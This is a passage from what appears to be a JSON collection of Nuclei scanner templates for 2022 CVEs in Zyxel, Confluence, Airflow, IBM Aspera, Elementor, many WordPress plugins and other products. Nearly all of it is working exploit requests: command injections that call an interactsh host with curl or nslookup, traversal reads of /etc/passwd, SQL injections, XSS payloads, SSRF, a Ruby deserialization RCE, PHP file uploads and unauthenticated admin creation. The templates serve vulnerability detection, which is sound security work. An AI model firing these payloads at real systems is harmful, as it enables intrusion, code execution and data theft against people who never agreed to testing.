'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-3982\"); ?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET 